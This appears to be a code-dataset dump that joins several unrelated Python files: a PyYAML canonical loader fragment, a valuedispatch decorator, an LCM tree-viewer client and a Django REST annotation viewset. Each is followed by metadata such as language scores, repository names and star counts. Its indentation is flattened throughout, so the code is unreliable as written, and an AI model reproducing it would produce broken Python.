'e': '\x1B',
'f': '\x0C',
'n': '\x0A',
'r': '\x0D',
't': '\x09',
'v': '\x0B',
'N': '\u0085',
'L': '\u2028',
'P': '\u2029',
'_': '_',
'0': '\x00',
}
def scan_scalar(self):
self.index += 1
chunks = []
start = self.index
ignore_spaces = False
while self.data[self.index] != '"':
if self.data[self.index] == '\\':
ignore_spaces = False
chunks.append(self.data[start:self.index])
self.index += 1
ch = self.data[self.index]
self.index += 1
if ch == '\n':
ignore_spaces = True
elif ch in self.QUOTE_CODES:
length = self.QUOTE_CODES[ch]
code = int(self.data[self.index:self.index+length], 16)
chunks.append(chr(code))
self.index += length
else:
if ch not in self.QUOTE_REPLACES:
raise CanonicalError("invalid escape code")
chunks.append(self.QUOTE_REPLACES[ch])
start = self.index
elif self.data[self.index] == '\n':
chunks.append(self.data[start:self.index])
chunks.append(' ')
self.index += 1
start = self.index
ignore_spaces = True
elif ignore_spaces and self.data[self.index] == ' ':
self.index += 1
start = self.index
else:
ignore_spaces = False
self.index += 1
chunks.append(self.data[start:self.index])
self.index += 1
return yaml.ScalarToken(''.join(chunks), False, None, None)
def find_token(self):
found = False
while not found:
while self.data[self.index] in ' \t':
self.index += 1
if self.data[self.index] == '#':
while self.data[self.index] != '\n':
self.index += 1
if self.data[self.index] == '\n':
self.index += 1
else:
found = True
class CanonicalParser:
def __init__(self):
self.events = []
self.parsed = False
# stream: STREAM-START document* STREAM-END
def parse_stream(self):
self.get_token(yaml.StreamStartToken)
self.events.append(yaml.StreamStartEvent(None, None))
while not self.check_token(yaml.StreamEndToken):
if self.check_token(yaml.DirectiveToken, yaml.DocumentStartToken):
self.parse_document()
else:
raise CanonicalError("document is expected, got "+repr(self.tokens[0]))
self.get_token(yaml.StreamEndToken)
self.events.append(yaml.StreamEndEvent(None, None))
# document: DIRECTIVE? DOCUMENT-START node
def parse_document(self):
node = None
if self.check_token(yaml.DirectiveToken):
self.get_token(yaml.DirectiveToken)
self.get_token(yaml.DocumentStartToken)
self.events.append(yaml.DocumentStartEvent(None, None))
self.parse_node()
self.events.append(yaml.DocumentEndEvent(None, None))
# node: ALIAS | ANCHOR? TAG? (SCALAR|sequence|mapping)
def parse_node(self):
if self.check_token(yaml.AliasToken):
self.events.append(yaml.AliasEvent(self.get_token_value(), None, None))
else:
anchor = None
if self.check_token(yaml.AnchorToken):
anchor = self.get_token_value()
tag = None
if self.check_token(yaml.TagToken):
tag = self.get_token_value()
if self.check_token(yaml.ScalarToken):
self.events.append(yaml.ScalarEvent(anchor, tag, (False, False), self.get_token_value(), None, None))
elif self.check_token(yaml.FlowSequenceStartToken):
self.events.append(yaml.SequenceStartEvent(anchor, tag, None, None))
self.parse_sequence()
elif self.check_token(yaml.FlowMappingStartToken):
self.events.append(yaml.MappingStartEvent(anchor, tag, None, None))
self.parse_mapping()
else:
raise CanonicalError("SCALAR, '[', or '{' is expected, got "+repr(self.tokens[0]))
# sequence: SEQUENCE-START (node (ENTRY node)*)? ENTRY? SEQUENCE-END
def parse_sequence(self):
self.get_token(yaml.FlowSequenceStartToken)
if not self.check_token(yaml.FlowSequenceEndToken):
self.parse_node()
while not self.check_token(yaml.FlowSequenceEndToken):
self.get_token(yaml.FlowEntryToken)
if not self.check_token(yaml.FlowSequenceEndToken):
self.parse_node()
self.get_token(yaml.FlowSequenceEndToken)
self.events.append(yaml.SequenceEndEvent(None, None))
# mapping: MAPPING-START (map_entry (ENTRY map_entry)*)? ENTRY? MAPPING-END
def parse_mapping(self):
self.get_token(yaml.FlowMappingStartToken)
if not self.check_token(yaml.FlowMappingEndToken):
self.parse_map_entry()
while not self.check_token(yaml.FlowMappingEndToken):
self.get_token(yaml.FlowEntryToken)
if not self.check_token(yaml.FlowMappingEndToken):
self.parse_map_entry()
self.get_token(yaml.FlowMappingEndToken)
self.events.append(yaml.MappingEndEvent(None, None))
# map_entry: KEY node VALUE node
def parse_map_entry(self):
self.get_token(yaml.KeyToken)
self.parse_node()
self.get_token(yaml.ValueToken)
self.parse_node()
def parse(self):
self.parse_stream()
self.parsed = True
def get_event(self):
if not self.parsed:
self.parse()
return self.events.pop(0)
def check_event(self, *choices):
if not self.parsed:
self.parse()
if self.events:
if not choices:
return True
for choice in choices:
if isinstance(self.events[0], choice):
return True
return False
def peek_event(self):
if not self.parsed:
self.parse()
return self.events[0]
class CanonicalLoader(CanonicalScanner, CanonicalParser,
yaml.composer.Composer, yaml.constructor.Constructor, yaml.resolver.Resolver):
def __init__(self, stream):
if hasattr(stream, 'read'):
stream = stream.read()
CanonicalScanner.__init__(self, stream)
CanonicalParser.__init__(self)
yaml.composer.Composer.__init__(self)
yaml.constructor.Constructor.__init__(self)
yaml.resolver.Resolver.__init__(self)
yaml.CanonicalLoader = CanonicalLoader
def canonical_scan(stream):
return yaml.scan(stream, Loader=CanonicalLoader)
yaml.canonical_scan = canonical_scan
def canonical_parse(stream):
return yaml.parse(stream, Loader=CanonicalLoader)
yaml.canonical_parse = canonical_parse
def canonical_compose(stream):
return yaml.compose(stream, Loader=CanonicalLoader)
yaml.canonical_compose = canonical_compose
def canonical_compose_all(stream):
return yaml.compose_all(stream, Loader=CanonicalLoader)
yaml.canonical_compose_all = canonical_compose_all
def canonical_load(stream):
return yaml.load(stream, Loader=CanonicalLoader)
yaml.canonical_load = canonical_load
def canonical_load_all(stream):
return yaml.load_all(stream, Loader=CanonicalLoader)
yaml.canonical_load_all = canonical_load_all
|
en
| 0.519769
|
# stream: STREAM-START document* STREAM-END # document: DIRECTIVE? DOCUMENT-START node # node: ALIAS | ANCHOR? TAG? (SCALAR|sequence|mapping) # sequence: SEQUENCE-START (node (ENTRY node)*)? ENTRY? SEQUENCE-END # mapping: MAPPING-START (map_entry (ENTRY map_entry)*)? ENTRY? MAPPING-END # map_entry: KEY node VALUE node
| 2.251443
| 2
|
valuedispatch.py
|
what-studio/valuedispatch
| 12
|
6628501
|
<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
valuedispatch
~~~~~~~~~~~~~
:mod:`valuedispatch`-like API but dispatches value instead of type.
:copyright: (c) 2015-2016 by What! Studio
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
__version__ = '0.0.1'
__all__ = ['valuedispatch']
# Import or define :class:`MappingProxyType`.
try:
from singledispatch_helpers import MappingProxyType
except ImportError:
try:
from collections import UserDict
except ImportError:
from UserDict import UserDict
class MappingProxyType(UserDict):
def __init__(self, data):
UserDict.__init__(self)
self.data = data
def valuedispatch(func):
"""Decorates a function to dispatch handler of the value of the first
argument.
"""
registry = {}
def dispatch(value):
return registry.get(value, func)
def register(value, func=None):
if func is None:
return lambda f: register(value, f)
registry[value] = func
return func
def wrapper(*args, **kw):
return dispatch(args[0])(*args, **kw)
wrapper.register = register
wrapper.dispatch = dispatch
wrapper.registry = MappingProxyType(registry)
update_wrapper(wrapper, func)
return wrapper
|
# -*- coding: utf-8 -*-
"""
valuedispatch
~~~~~~~~~~~~~
:mod:`valuedispatch`-like API but dispatches value instead of type.
:copyright: (c) 2015-2016 by What! Studio
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
__version__ = '0.0.1'
__all__ = ['valuedispatch']
# Import or define :class:`MappingProxyType`.
try:
from singledispatch_helpers import MappingProxyType
except ImportError:
try:
from collections import UserDict
except ImportError:
from UserDict import UserDict
class MappingProxyType(UserDict):
def __init__(self, data):
UserDict.__init__(self)
self.data = data
def valuedispatch(func):
"""Decorates a function to dispatch handler of the value of the first
argument.
"""
registry = {}
def dispatch(value):
return registry.get(value, func)
def register(value, func=None):
if func is None:
return lambda f: register(value, f)
registry[value] = func
return func
def wrapper(*args, **kw):
return dispatch(args[0])(*args, **kw)
wrapper.register = register
wrapper.dispatch = dispatch
wrapper.registry = MappingProxyType(registry)
update_wrapper(wrapper, func)
return wrapper
|
en
| 0.501435
|
# -*- coding: utf-8 -*- valuedispatch ~~~~~~~~~~~~~ :mod:`valuedispatch`-like API but dispatches value instead of type. :copyright: (c) 2015-2016 by What! Studio :license: BSD, see LICENSE for more details. # Import or define :class:`MappingProxyType`. Decorates a function to dispatch handler of the value of the first argument.
| 2.308673
| 2
|
src/python/director/viewerclient.py
|
edrumwri/director
| 0
|
6628502
|
<reponame>edrumwri/director<gh_stars>0
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = bytearray(json.dumps(data), encoding='utf-8')
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform))
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1,1,1]):
self.lengths = lengths
def serialize(self):
return {
"type": "box",
"lengths": list(self.lengths)
}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {
"type": "sphere",
"radius": self.radius
}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1,1,1]):
self.radii = radii
def serialize(self):
return {
"type": "ellipsoid",
"radii": list(self.radii)
}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {
"type": "cylinder",
"length": self.length,
"radius": self.radius
}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {
"type": "triad",
"scale": self.scale,
"tube": self.tube
}
class PointCloud(BaseGeometry):
__slots__ = ["points", "channels"]
def __init__(self, points, channels={}):
self.points = points
self.channels = channels
def serialize(self):
return {
"type": "pointcloud",
"points": [list(p) for p in self.points],
"channels": {name: [list(c) for c in values] for (name, values) in self.channels.items()}
}
class PolyLine(BaseGeometry):
def __init__(self, points, radius=0.01, closed=False,
start_head=False, end_head=False,
head_radius=0.05, head_length=None):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": [list(p) for p in self.points],
"radius": self.radius,
"closed": self.closed
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in list(self.children.items()):
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,),
lcm=self.core.lcm,
core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
self.publish_immediately = True
self.lcm.subscribe(self._response_channel(),
self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(
target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data.decode())
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data.decode()))
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append({
"path": path,
"geometries": [geom.serialize() for geom in geoms]
})
for path in self.queue.settransform:
settransform.append({
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform)
})
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform
}
if __name__ == '__main__':
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[GeometryData(Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]))
for x in range(10)])
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1])))
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
# bug, the sphere is loaded and replaces the previous
# geometry but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
#vis.delete()
|
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = bytearray(json.dumps(data), encoding='utf-8')
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform))
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1,1,1]):
self.lengths = lengths
def serialize(self):
return {
"type": "box",
"lengths": list(self.lengths)
}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {
"type": "sphere",
"radius": self.radius
}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1,1,1]):
self.radii = radii
def serialize(self):
return {
"type": "ellipsoid",
"radii": list(self.radii)
}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {
"type": "cylinder",
"length": self.length,
"radius": self.radius
}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {
"type": "triad",
"scale": self.scale,
"tube": self.tube
}
class PointCloud(BaseGeometry):
__slots__ = ["points", "channels"]
def __init__(self, points, channels={}):
self.points = points
self.channels = channels
def serialize(self):
return {
"type": "pointcloud",
"points": [list(p) for p in self.points],
"channels": {name: [list(c) for c in values] for (name, values) in self.channels.items()}
}
class PolyLine(BaseGeometry):
def __init__(self, points, radius=0.01, closed=False,
start_head=False, end_head=False,
head_radius=0.05, head_length=None):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": [list(p) for p in self.points],
"radius": self.radius,
"closed": self.closed
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in list(self.children.items()):
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,),
lcm=self.core.lcm,
core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
self.publish_immediately = True
self.lcm.subscribe(self._response_channel(),
self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(
target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data.decode())
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data.decode()))
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append({
"path": path,
"geometries": [geom.serialize() for geom in geoms]
})
for path in self.queue.settransform:
settransform.append({
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform)
})
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform
}
if __name__ == '__main__':
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[GeometryData(Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]))
for x in range(10)])
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1])))
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
# bug, the sphere is loaded and replaces the previous
# geometry but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
#vis.delete()
|
en
| 0.859218
|
A Visualizer is a lightweight object that contains a CoreVisualizer and a path. The CoreVisualizer does all of the work of storing geometries and publishing LCM messages. By storing the path in the Visualizer instance, we make it easy to do things like store or pass a Visualizer that draws to a sub-part of the viewer tree. Many Visualizer objects can all share the same CoreVisualizer. Set the geometries at this visualizer's path to the given geomdata (replacing whatever was there before). geomdata can be any one of: * a single BaseGeometry * a single GeometryData * a collection of any combinations of BaseGeometry and GeometryData Set the transform for this visualizer's path (and, implicitly, any descendants of that path). tform should be a 4x4 numpy array representing a homogeneous transform Delete the geometry at this visualizer's path. Indexing into a visualizer returns a new visualizer with the given path appended to this visualizer's path. Start a Python thread that will subscribe to messages from the remote viewer and handle those responses. This enables automatic reloading of geometry into the viewer if, for example, the viewer is restarted later. # We can provide an initial path if we want # Start a thread to handle responses from the viewer. Doing this enables # the automatic reloading of missing geometry if the viewer is restarted. # Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily # implemented, so these sub-visualizers come into being as soon as they're # asked for # Setting the geometry preserves the transform at that path. # Call settransform(np.eye(4)) if you want to clear the transform. # bug, the sphere is loaded and replaces the previous # geometry but it is not drawn with the correct color mode #vis.delete()
| 2.192466
| 2
|
annotations/views.py
|
connectik/digital-manifesto
| 0
|
6628503
|
<reponame>connectik/digital-manifesto
from __future__ import absolute_import, unicode_literals
from rest_framework import permissions, viewsets, views, parsers, renderers, filters
from . import models, serializers
class AnnotationRenderer(renderers.JSONRenderer):
"""
Format our JSON response so Annotator JS will recognize it.
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
if isinstance(data, (list, tuple)):
data = {'rows': data}
return super(AnnotationRenderer, self).render(data, accepted_media_type=accepted_media_type, renderer_context=renderer_context)
class AnnotationViewSet(viewsets.ModelViewSet):
"""
View to handle all Annotator JS requests
"""
queryset = models.Annotation.objects.defer('text_object__text').select_related('text_object')
serializer_class = serializers.AnnotationSerializer
permission_classes = (permissions.AllowAny,)
parser_classes = (parsers.JSONParser,)
filter_backends = (filters.DjangoFilterBackend,)
filter_fields = ('text_object_id', 'uri')
renderer_classes = (AnnotationRenderer, renderers.BrowsableAPIRenderer)
class AnnotationIndexAPI(views.APIView):
"""
Placeholder view for use in `urlpatterns` so we can `reverse()` our API endpoint
"""
pass
|
from __future__ import absolute_import, unicode_literals
from rest_framework import permissions, viewsets, views, parsers, renderers, filters
from . import models, serializers
class AnnotationRenderer(renderers.JSONRenderer):
"""
Format our JSON response so Annotator JS will recognize it.
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
if isinstance(data, (list, tuple)):
data = {'rows': data}
return super(AnnotationRenderer, self).render(data, accepted_media_type=accepted_media_type, renderer_context=renderer_context)
class AnnotationViewSet(viewsets.ModelViewSet):
"""
View to handle all Annotator JS requests
"""
queryset = models.Annotation.objects.defer('text_object__text').select_related('text_object')
serializer_class = serializers.AnnotationSerializer
permission_classes = (permissions.AllowAny,)
parser_classes = (parsers.JSONParser,)
filter_backends = (filters.DjangoFilterBackend,)
filter_fields = ('text_object_id', 'uri')
renderer_classes = (AnnotationRenderer, renderers.BrowsableAPIRenderer)
class AnnotationIndexAPI(views.APIView):
"""
Placeholder view for use in `urlpatterns` so we can `reverse()` our API endpoint
"""
pass
|
en
| 0.78222
|
Format our JSON response so Annotator JS will recognize it. View to handle all Annotator JS requests Placeholder view for use in `urlpatterns` so we can `reverse()` our API endpoint
| 2.106239
| 2
|
ipapi/class_pipelines/ip_factory.py
|
tpmp-inra/ipso_cli
| 0
|
6628504
|
import inspect
import sys
import pkgutil
import ipapi.class_pipelines as class_pipelines
